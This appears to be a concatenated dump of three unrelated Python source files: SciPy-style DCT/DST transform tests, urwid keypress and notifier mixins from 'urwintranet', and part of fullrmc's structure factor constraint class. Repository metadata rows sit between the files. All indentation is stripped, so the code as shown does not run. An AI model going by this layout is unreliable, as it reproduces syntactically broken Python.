self.dec = 10
self.type = 2
class TestDCTIIFloat(_TestDCTIIBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 2
class TestDCTIIInt(_TestDCTIIBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 2
class TestDCTIIIDouble(_TestDCTIIIBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestDCTIIIFloat(_TestDCTIIIBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 3
class TestDCTIIIInt(_TestDCTIIIBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 3
class _TestIDCTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = 14
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dct_ref(self.type, i, self.rdt)
x = idct(yr, type=self.type)
if self.type == 1:
x /= 2 * (i - 1)
else:
x /= 2 * i
assert_equal(x.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(x / np.max(x), xr / np.max(x), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestIDCTIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 1
class TestIDCTIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 4
self.type = 1
class TestIDCTIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 4
self.type = 1
class TestIDCTIIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 2
class TestIDCTIIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 2
class TestIDCTIIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 2
class TestIDCTIIIDouble(_TestIDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestIDCTIIIFloat(_TestIDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 3
class TestIDCTIIIInt(_TestIDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 3
class _TestDSTBase(TestCase):
def setUp(self):
self.rdt = None # dtype
self.dec = None # number of decimals to match
self.type = None # dst type
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dst_ref(self.type, i, self.rdt)
y = dst(xr, type=self.type)
assert_equal(y.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(y / np.max(y), yr / np.max(y), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestDSTIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 1
class TestDSTIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 1
class TestDSTIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 1
class TestDSTIIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 2
class TestDSTIIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 2
class TestDSTIIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 2
class TestDSTIIIDouble(_TestDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestDSTIIIFloat(_TestDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 7
self.type = 3
class TestDSTIIIInt(_TestDSTBase):
def setUp(self):
self.rdt = int
self.dec = 7
self.type = 3
class _TestIDSTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = None
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
xr, yr, dt = fftw_dst_ref(self.type, i, self.rdt)
x = idst(yr, type=self.type)
if self.type == 1:
x /= 2 * (i + 1)
else:
x /= 2 * i
assert_equal(x.dtype, dt)
# XXX: we divide by np.max(x) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(x / np.max(x), xr / np.max(x), decimal=self.dec,
err_msg="Size %d failed" % i)
class TestIDSTIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 12
self.type = 1
class TestIDSTIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 4
self.type = 1
class TestIDSTIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 4
self.type = 1
class TestIDSTIIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 2
class TestIDSTIIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 2
class TestIDSTIIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 2
class TestIDSTIIIDouble(_TestIDSTBase):
def setUp(self):
self.rdt = np.double
self.dec = 14
self.type = 3
class TestIDSTIIIFloat(_TestIDSTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 6
self.type = 3
class TestIDSTIIIInt(_TestIDSTBase):
def setUp(self):
self.rdt = int
self.dec = 6
self.type = 3
class TestOverwrite(object):
"""Check input overwrite behavior """
real_dtypes = [np.float32, np.float64]
def _check(self, x, routine, type, fftsize, axis, norm, overwrite_x,
should_overwrite, **kw):
x2 = x.copy()
routine(x2, type, fftsize, axis, norm, overwrite_x=overwrite_x)
sig = "%s(%s%r, %r, axis=%r, overwrite_x=%r)" % (
routine.__name__, x.dtype, x.shape, fftsize, axis, overwrite_x)
if not should_overwrite:
assert_equal(x2, x, err_msg="spurious overwrite in %s" % sig)
def _check_1d(self, routine, dtype, shape, axis, overwritable_dtypes):
np.random.seed(1234)
if np.issubdtype(dtype, np.complexfloating):
data = np.random.randn(*shape) + 1j * np.random.randn(*shape)
else:
data = np.random.randn(*shape)
data = data.astype(dtype)
for type in [1, 2, 3]:
for overwrite_x in [True, False]:
for norm in [None, 'ortho']:
if type == 1 and norm == 'ortho':
continue
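                    # overwrite is only expected for overwritable dtypes when the transform axis is the last (contiguous) one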
should_overwrite = (overwrite_x
and dtype in overwritable_dtypes
and (len(shape) == 1 or
(axis % len(shape) == len(shape) - 1
)))
self._check(data, routine, type, None, axis, norm,
overwrite_x, should_overwrite)
def test_dct(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(dct, dtype, (16,), -1, overwritable)
self._check_1d(dct, dtype, (16, 2), 0, overwritable)
self._check_1d(dct, dtype, (2, 16), 1, overwritable)
def test_idct(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(idct, dtype, (16,), -1, overwritable)
self._check_1d(idct, dtype, (16, 2), 0, overwritable)
self._check_1d(idct, dtype, (2, 16), 1, overwritable)
def test_dst(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(dst, dtype, (16,), -1, overwritable)
self._check_1d(dst, dtype, (16, 2), 0, overwritable)
self._check_1d(dst, dtype, (2, 16), 1, overwritable)
def test_idst(self):
overwritable = self.real_dtypes
for dtype in self.real_dtypes:
self._check_1d(idst, dtype, (16,), -1, overwritable)
self._check_1d(idst, dtype, (16, 2), 0, overwritable)
self._check_1d(idst, dtype, (2, 16), 1, overwritable)
if __name__ == "__main__":
np.testing.run_module_suite()
| mit | -2,302,924,072,416,488,400 | 27.3327 | 86 | 0.551902 | false |
jespino/urwintranet | urwintranet/ui/widgets/mixins.py | 1 | 3127 | # -*- coding: utf-8 -*-
"""
urwintranet.ui.widgets.mixins
~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import urwid
class IgnoreKeyPressMixin(object):
def keypress(self, size, key):
return key
class KeyPressMixin(object):
signals = ["click"]
def keypress(self, size, key):
"""
Send 'click' signal on 'activate' command.
>>> assert Button._command_map[' '] == 'activate'
>>> assert Button._command_map['enter'] == 'activate'
>>> size = (15,)
>>> b = Button("Cancel")
>>> clicked_buttons = []
>>> def handle_click(button):
... clicked_buttons.append(button.label)
>>> connect_signal(b, 'click', handle_click)
>>> b.keypress(size, 'enter')
>>> b.keypress(size, ' ')
>>> clicked_buttons # ... = u in Python 2
[...'Cancel', ...'Cancel']
"""
if self._command_map[key] != urwid.ACTIVATE:
return key
self._emit('click')
def mouse_event(self, size, event, button, x, y, focus):
"""
Send 'click' signal on button 1 press.
>>> size = (15,)
>>> b = Button("Ok")
>>> clicked_buttons = []
>>> def handle_click(button):
... clicked_buttons.append(button.label)
>>> connect_signal(b, 'click', handle_click)
>>> b.mouse_event(size, 'mouse press', 1, 4, 0, True)
True
>>> b.mouse_event(size, 'mouse press', 2, 4, 0, True) # ignored
False
>>> clicked_buttons # ... = u in Python 2
[...'Ok']
"""
if button != 1 or not urwid.util.is_mouse_press(event):
return False
self._emit('click')
return True
class FormMixin(object):
FORM_KEYS = {
"tab": "down",
"shift tab": "up",
}
def keypress(self, size, key):
key = self.FORM_KEYS.get(key, key)
return super().keypress(size, key)
class ViMotionMixin(object):
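    # remap vi-style h/j/k/l motion keys to urwid's arrow-key commands before normal key handling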
VI_KEYS = {
"j": "down",
"k": "up",
"h": "left",
"l": "right",
}
def keypress(self, size, key):
key = self.VI_KEYS.get(key, key)
return super().keypress(size, key)
class EmacsMotionMixin(object):
EMACS_KEYS = {
"ctrl n": "down",
"ctrl p": "up",
"ctrl b": "left",
"ctrl f": "right",
}
def keypress(self, size, key):
key = self.EMACS_KEYS.get(key, key)
return super().keypress(size, key)
class NotifierMixin(object):
ERROR_PREFIX = ""
ERROR_ATTR = "error"
INFO_PREFIX = ""
INFO_ATTR = "info"
ALIGN = "center"
def error_msg(self, text):
self.set_text((self.ERROR_ATTR, self.ERROR_PREFIX + text))
self.set_align_mode(self.ALIGN)
def info_msg(self, text):
self.set_text((self.INFO_ATTR, self.INFO_PREFIX + text))
self.set_align_mode(self.ALIGN)
def clear_msg(self):
self.set_text("")
class PlainButtonMixin(object):
button_left = urwid.Text("")
button_right = urwid.Text("")
class NonSelectableMixin(object):
def selectable(self):
return False
| apache-2.0 | 4,975,754,046,936,183,000 | 24.016 | 71 | 0.523825 | false |
bachiraoun/fullrmc | Constraints/StructureFactorConstraints.py | 1 | 64342 | """
StructureFactorConstraints contains classes for all constraints related experimental static structure factor functions.
.. inheritance-diagram:: fullrmc.Constraints.StructureFactorConstraints
:parts: 1
"""
# standard libraries imports
from __future__ import print_function
import itertools, re
# external libraries imports
import numpy as np
from pdbparser.Utilities.Database import is_element_property, get_element_property
from pdbparser.Utilities.Collection import get_normalized_weighting
# fullrmc imports
from ..Globals import INT_TYPE, FLOAT_TYPE, PI, PRECISION, LOGGER
from ..Globals import str, long, unicode, bytes, basestring, range, xrange, maxint
from ..Core.Collection import is_number, is_integer, get_path
from ..Core.Collection import reset_if_collected_out_of_date, get_real_elements_weight
from ..Core.Collection import get_caller_frames
from ..Core.Constraint import Constraint, ExperimentalConstraint
from ..Core.pairs_histograms import multiple_pairs_histograms_coords, full_pairs_histograms_coords
class StructureFactorConstraint(ExperimentalConstraint):
"""
    Controls the Structure Factor, denoted S(Q) and also called the
    total-scattering structure function or Static Structure Factor.
    S(Q) is a dimensionless quantity, normalized such that the average
    value :math:`<S(Q)>=1`.
    It is worth mentioning that S(Q) is nothing other than the normalized and
    corrected powder diffraction pattern once all experimental artefacts are removed.
The computation of S(Q) is done through an inverse Sine Fourier transform
of the computed pair distribution function G(r).
.. math::
S(Q) = 1+ \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
From an atomistic model and histogram point of view, G(r) is computed as
the following:
.. math::
G(r) = 4 \\pi r (\\rho_{r} - \\rho_{0})
= 4 \\pi \\rho_{0} r (g(r)-1)
= \\frac{R(r)}{r} - 4 \\pi \\rho_{0}
g(r) is calculated after binning all pair atomic distances into a
weighted histograms as the following:
.. math::
g(r) = \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{\\rho_{i,j}(r)}{\\rho_{0}}
= \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{n_{i,j}(r) / v(r)}{N_{i,j} / V}
Where:\n
:math:`Q` is the momentum transfer. \n
:math:`r` is the distance between two atoms. \n
:math:`\\rho_{i,j}(r)` is the pair density function of atoms i and j. \n
:math:`\\rho_{0}` is the average number density of the system. \n
:math:`w_{i,j}` is the relative weighting of atom types i and j. \n
:math:`R(r)` is the radial distribution function (rdf). \n
:math:`N` is the total number of atoms. \n
:math:`V` is the volume of the system. \n
:math:`n_{i,j}(r)` is the number of atoms i neighbouring j at a distance r. \n
:math:`v(r)` is the annulus volume at distance r and of thickness dr. \n
:math:`N_{i,j}` is the total number of atoms i and j in the system. \n
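    As an illustration only (not fullrmc's internal implementation), the
    discretized inverse sine Fourier transform above can be sketched with
    plain numpy, assuming a G(r) histogram ``gr`` evaluated at shell centers
    ``r`` of constant width ``dr`` and momentum transfer values ``q``:
    .. code-block:: python
        import numpy as np
        def gr_to_sq(r, gr, q, dr):
            # S(Q) = 1 + (1/Q) * sum_r G(r)*sin(Q*r)*dr  (rectangle-rule quadrature)
            sinqr = np.sin(np.outer(q, r))      # shape (len(q), len(r))
            return 1.0 + np.dot(sinqr, gr * dr) / q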
+----------------------------------------------------------------------+
|.. figure:: reduced_structure_factor_constraint_plot_method.png |
| :width: 530px |
| :height: 400px |
| :align: left |
| |
| Reduced structure factor of memory shape Nickel-Titanium alloy. |
+----------------------------------------------------------------------+
:Parameters:
#. experimentalData (numpy.ndarray, string): Experimental data as
numpy.ndarray or string path to load data using numpy.loadtxt
method.
#. dataWeights (None, numpy.ndarray): Weights array of the same number
of points of experimentalData used in the constraint's standard
error computation. Therefore particular fitting emphasis can be
put on different data points that might be considered as more or less
           important in order to get a reasonable and plausible model.\n
If None is given, all data points are considered of the same
importance in the computation of the constraint's standard error.\n
           If numpy.ndarray is given, all weights must be positive and all
           zero-weighted data points won't contribute to the total
           constraint's standard error. At least a single weight point is
           required to be non-zero and the weights array will be automatically
           scaled upon setting such that the sum of all the weights
           is equal to the number of data points.
#. weighting (string): The elements weighting scheme. It must be any
atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius) defined
in pdbparser database. In case of xrays or neutrons experimental
weights, one can simply set weighting to 'xrays' or 'neutrons'
and the value will be automatically adjusted to respectively
'atomicNumber' and 'neutronCohb'. If attribute values are
missing in the pdbparser database, atomic weights must be
given in atomsWeight dictionary argument.
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
           atoms elements and values are custom weights. If None is given
           or partially given, missing elements weighting will be fully set
           using the given weighting scheme.
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
#. scaleFactor (number): A normalization scale factor used to normalize
the computed data to the experimental ones.
#. adjustScaleFactor (list, tuple): Used to adjust fit or guess
the best scale factor during stochastic engine runtime.
It must be a list of exactly three entries.\n
#. The frequency in number of generated moves of finding the best
scale factor. If 0 frequency is given, it means that the scale
factor is fixed.
#. The minimum allowed scale factor value.
#. The maximum allowed scale factor value.
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles; the main reason, among others, is that
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore the window function is
used to best imitate the numerical artefacts in the experimental
data.
#. limits (None, tuple, list): The distance limits to compute the
histograms. If None is given, the limits will be automatically
set to the min and max distance of the experimental data.
Otherwise, a tuple of exactly two items where the first is the
minimum distance or None and the second is the maximum distance
or None.
**NB**: If adjustScaleFactor first item (frequency) is 0, the scale factor
will remain untouched and the limits minimum and maximum won't be checked.
.. code-block:: python
# import fullrmc modules
from fullrmc.Engine import Engine
from fullrmc.Constraints.StructureFactorConstraints import StructureFactorConstraint
# create engine
ENGINE = Engine(path='my_engine.rmc')
# set pdb file
ENGINE.set_pdb('system.pdb')
# create and add constraint
SFC = StructureFactorConstraint(experimentalData="sq.dat", weighting="atomicNumber")
ENGINE.add_constraints(SFC)
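# a minimal follow-up sketch, assuming the usual Engine.run signature;
# the number of steps and save frequency below are arbitrary values
ENGINE.run(numberOfSteps=10000, saveFrequency=1000)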
"""
def __init__(self, experimentalData, dataWeights=None,
weighting="atomicNumber", atomsWeight=None,
rmin=None, rmax=None, dr=None,
scaleFactor=1.0, adjustScaleFactor=(0, 0.8, 1.2),
windowFunction=None, limits=None):
# initialize variables
self.__experimentalQValues = None
self.__experimentalSF = None
self.__rmin = None
self.__rmax = None
self.__dr = None
self.__minimumDistance = None
self.__maximumDistance = None
self.__bin = None
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
self.__Gr2SqMatrix = None
# initialize constraint
super(StructureFactorConstraint, self).__init__( experimentalData=experimentalData, dataWeights=dataWeights, scaleFactor=scaleFactor, adjustScaleFactor=adjustScaleFactor)
# set atomsWeight
self.set_atoms_weight(atomsWeight)
# set elements weighting
self.set_weighting(weighting)
self.__set_weighting_scheme()
# set window function
self.set_window_function(windowFunction)
# set r parameters
self.set_rmin(rmin)
self.set_rmax(rmax)
self.set_dr(dr)
# set frame data
FRAME_DATA = [d for d in self.FRAME_DATA]
FRAME_DATA.extend(['_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__atomsWeight',
'_StructureFactorConstraint__qmin',
'_StructureFactorConstraint__qmax',
'_StructureFactorConstraint__rmin',
'_StructureFactorConstraint__rmax',
'_StructureFactorConstraint__dr',
'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin',
'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__windowFunction',
'_elementsWeight',] )
RUNTIME_DATA = [d for d in self.RUNTIME_DATA]
RUNTIME_DATA.extend( [] )
object.__setattr__(self, 'FRAME_DATA', tuple(FRAME_DATA) )
object.__setattr__(self, 'RUNTIME_DATA', tuple(RUNTIME_DATA) )
def _codify_update__(self, name='constraint', addDependencies=True):
dependencies = []
code = []
if addDependencies:
code.extend(dependencies)
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name}.set_used({val})".format(name=name, val=self.used))
code.append("{name}.set_scale_factor({val})".format(name=name, val=self.scaleFactor))
code.append("{name}.set_adjust_scale_factor({val})".format(name=name, val=self.adjustScaleFactor))
code.append("{name}.set_data_weights(dw)".format(name=name))
code.append("{name}.set_atoms_weight({val})".format(name=name, val=self.atomsWeight))
code.append("{name}.set_window_function(wf)".format(name=name))
code.append("{name}.set_rmin({val})".format(name=name, val=self.rmin))
code.append("{name}.set_rmax({val})".format(name=name, val=self.rmax))
code.append("{name}.set_dr({val})".format(name=name, val=self.dr))
code.append("{name}.set_limits({val})".format(name=name, val=self.limits))
# return
return dependencies, '\n'.join(code)
def _codify__(self, engine, name='constraint', addDependencies=True):
assert isinstance(name, basestring), LOGGER.error("name must be a string")
assert re.match('[a-zA-Z_][a-zA-Z0-9_]*$', name) is not None, LOGGER.error("given name '%s' can't be used as a variable name"%name)
klass = self.__class__.__name__
dependencies = ['import numpy as np','from fullrmc.Constraints import StructureFactorConstraints']
code = []
if addDependencies:
code.extend(dependencies)
x = list(self.experimentalData[:,0])
y = list(self.experimentalData[:,1])
code.append("x = {x}".format(x=x))
code.append("y = {y}".format(y=y))
code.append("d = np.transpose([x,y]).astype(np.float32)")
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name} = {klass}s.{klass}\
(experimentalData=d, dataWeights=dw, weighting='{weighting}', atomsWeight={atomsWeight}, \
rmin={rmin}, rmax={rmax}, dr={dr}, scaleFactor={scaleFactor}, adjustScaleFactor={adjustScaleFactor}, \
windowFunction=wf, limits={limits})".format(name=name, klass=klass,
weighting=self.weighting, atomsWeight=self.atomsWeight, rmin=self.rmin,
rmax=self.rmax, dr=self.dr, scaleFactor=self.scaleFactor,
adjustScaleFactor=self.adjustScaleFactor, limits=self.limits))
code.append("{engine}.add_constraints([{name}])".format(engine=engine, name=name))
# return
return dependencies, '\n'.join(code)
#def __getstate__(self):
# # make sure that __Gr2SqMatrix is not pickled but saved to the disk as None
# state = super(StructureFactorConstraint, self).__getstate__()
# state["_StructureFactorConstraint__Gr2SqMatrix"] = None
# return state
#
#def __setstate__(self, state):
# # make sure to regenerate G(r) to S(q) matrix at loading time
# self.__dict__.update( state )
# self.__set_Gr_2_Sq_matrix()
#
def __set_Gr_2_Sq_matrix(self):
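# build the sine Fourier transform kernel relating the model G(r) to S(q):
# M[r,q] = dr*sin(q*r)/q, so that S(q) = 1 + sum_r G(r)*M[r,q]
# (used in _get_Sq_from_Gr)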
if self.__experimentalQValues is None or self.__shellCenters is None:
self.__Gr2SqMatrix = None
else:
Qs = self.__experimentalQValues
Rs = self.__shellCenters
dr = self.__shellCenters[1]-self.__shellCenters[0]
qr = Rs.reshape((-1,1))*(np.ones((len(Rs),1), dtype=FLOAT_TYPE)*Qs)
sinqr = np.sin(qr)
sinqr_q = sinqr/Qs
self.__Gr2SqMatrix = dr*sinqr_q
def __set_weighting_scheme(self):
if self.engine is not None:
self.__elementsPairs = sorted(itertools.combinations_with_replacement(self.engine.elements,2))
#elementsWeight = dict([(el,float(get_element_property(el,self.__weighting))) for el in self.engine.elements])
#self._elementsWeight = dict([(el,self.__atomsWeight.get(el, float(get_element_property(el,self.__weighting)))) for el in self.engine.elements])
self._elementsWeight = get_real_elements_weight(elements=self.engine.elements, weightsDict=self.__atomsWeight, weighting=self.__weighting)
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight)
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
else:
self.__elementsPairs = None
self.__weightingScheme = None
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__elementsPairs' : self.__elementsPairs,
'_StructureFactorConstraint__weightingScheme': self.__weightingScheme})
def __set_histogram(self):
if self.__minimumDistance is None or self.__maximumDistance is None or self.__bin is None:
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
else:
# compute edges
if self.engine is not None and self.rmax is None:
minHalfBox = np.min( [np.linalg.norm(v)/2. for v in self.engine.basisVectors])
self.__edges = np.arange(self.__minimumDistance,minHalfBox, self.__bin).astype(FLOAT_TYPE)
else:
self.__edges = np.arange(self.__minimumDistance, self.__maximumDistance+self.__bin, self.__bin).astype(FLOAT_TYPE)
# adjust rmin and rmax
self.__minimumDistance = self.__edges[0]
self.__maximumDistance = self.__edges[-1]
# compute shellCenters
self.__shellCenters = (self.__edges[0:-1]+self.__edges[1:])/FLOAT_TYPE(2.)
# set histogram size
self.__histogramSize = INT_TYPE( len(self.__edges)-1 )
# set shell centers and volumes
self.__shellVolumes = FLOAT_TYPE(4.0/3.)*PI*((self.__edges[1:])**3 - self.__edges[0:-1]**3)
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__minimumDistance': self.__minimumDistance,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance,
'_StructureFactorConstraint__shellCenters' : self.__shellCenters,
'_StructureFactorConstraint__histogramSize' : self.__histogramSize,
'_StructureFactorConstraint__shellVolumes' : self.__shellVolumes})
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def _on_collector_reset(self):
pass
@property
def rmin(self):
""" Histogram minimum distance. """
return self.__rmin
@property
def rmax(self):
""" Histogram maximum distance. """
return self.__rmax
@property
def dr(self):
""" Histogram bin size."""
return self.__dr
@property
def bin(self):
""" Computed histogram distance bin size."""
return self.__bin
@property
def minimumDistance(self):
""" Computed histogram minimum distance. """
return self.__minimumDistance
@property
def maximumDistance(self):
""" Computed histogram maximum distance. """
return self.__maximumDistance
@property
def qmin(self):
""" Experimental data reciprocal distances minimum. """
return self.__qmin
@property
def qmax(self):
""" Experimental data reciprocal distances maximum. """
return self.__qmax
@property
def dq(self):
""" Experimental data reciprocal distances bin size. """
return self.__experimentalQValues[1]-self.__experimentalQValues[0]
@property
def experimentalQValues(self):
""" Experimental data used q values. """
return self.__experimentalQValues
@property
def histogramSize(self):
""" Histogram size"""
return self.__histogramSize
@property
def shellCenters(self):
""" Shells center array"""
return self.__shellCenters
@property
def shellVolumes(self):
""" Shells volume array"""
return self.__shellVolumes
@property
def experimentalSF(self):
""" Experimental Structure Factor or S(q)"""
return self.__experimentalSF
@property
def elementsPairs(self):
""" Elements pairs """
return self.__elementsPairs
@property
def atomsWeight(self):
"""Custom atoms weight"""
return self.__atomsWeight
@property
def weighting(self):
""" Elements weighting definition. """
return self.__weighting
@property
def weightingScheme(self):
""" Elements weighting scheme. """
return self.__weightingScheme
@property
def windowFunction(self):
""" Convolution window function. """
return self.__windowFunction
@property
def Gr2SqMatrix(self):
""" G(r) to S(q) transformation matrix."""
return self.__Gr2SqMatrix
@property
def _experimentalX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
@property
def _experimentalY(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalSF
@property
def _modelX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
def listen(self, message, argument=None):
"""
Listens to any message sent from the Broadcaster.
:Parameters:
#. message (object): Any python object to send to constraint's
listen method.
#. argument (object): Any type of argument to pass to the
listeners.
"""
if message in ("engine set","update pdb","update molecules indexes","update elements indexes","update names indexes"):
self.__set_weighting_scheme()
# reset histogram
if self.engine is not None:
self.__set_histogram()
self.reset_constraint() # ADDED 2017-JAN-08
elif message in("update boundary conditions",):
self.reset_constraint()
def set_rmin(self, rmin):
"""
Set rmin value.
:parameters:
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
"""
if rmin is None:
minimumDistance = FLOAT_TYPE( 2.*PI/self.__qmax )
else:
assert is_number(rmin), LOGGER.error("rmin must be None or a number")
minimumDistance = FLOAT_TYPE(rmin)
if self.__maximumDistance is not None:
assert minimumDistance<self.__maximumDistance, LOGGER.error("rmin must be smaller than rmax %s"%self.__maximumDistance)
self.__rmin = rmin
self.__minimumDistance = minimumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmin': self.__rmin,
'_StructureFactorConstraint__minimumDistance': self.__minimumDistance})
# reset histogram
self.__set_histogram()
def set_rmax(self, rmax):
"""
Set rmax value.
:Parameters:
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
"""
if rmax is None:
dq = self.__experimentalQValues[1]-self.__experimentalQValues[0]
maximumDistance = FLOAT_TYPE( 2.*PI/dq )
else:
assert is_number(rmax), LOGGER.error("rmax must be None or a number")
maximumDistance = FLOAT_TYPE(rmax)
if self.__minimumDistance is not None:
assert maximumDistance>self.__minimumDistance, LOGGER.error("rmax must be bigger than rmin %s"%self.__minimumDistance)
self.__rmax = rmax
self.__maximumDistance = maximumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmax': self.__rmax,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance})
# reset histogram
self.__set_histogram()
def set_dr(self, dr):
"""
Set dr value.
:Parameters:
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
"""
if dr is None:
bin = 2.*PI/self.__qmax
rbin = round(bin,1)
if rbin>bin:
rbin -= 0.1
bin = FLOAT_TYPE( rbin )
else:
assert is_number(dr), LOGGER.error("dr must be None or a number")
bin = FLOAT_TYPE(dr)
self.__dr = dr
self.__bin = bin
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__dr': self.__dr,
'_StructureFactorConstraint__bin': self.__bin})
# reset histogram
self.__set_histogram()
def set_weighting(self, weighting):
"""
Set elements weighting. It must be a valid entry of pdbparser atom's
database.
:Parameters:
#. weighting (string): The elements weighting scheme. It must be
any atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius)
defined in pdbparser database. In case of xrays or neutrons
experimental weights, one can simply set weighting to 'xrays'
or 'neutrons' and the value will be automatically adjusted to
respectively 'atomicNumber' and 'neutronCohb'. If attribute
values are missing in the pdbparser database, atomic weights
must be given in atomsWeight dictionary argument.
"""
if weighting.lower() in ["xrays","x-rays","xray","x-ray"]:
LOGGER.fixed("'%s' weighting is set to atomicNumber"%weighting)
weighting = "atomicNumber"
elif weighting.lower() in ["neutron","neutrons"]:
LOGGER.fixed("'%s' weighting is set to neutronCohb"%weighting)
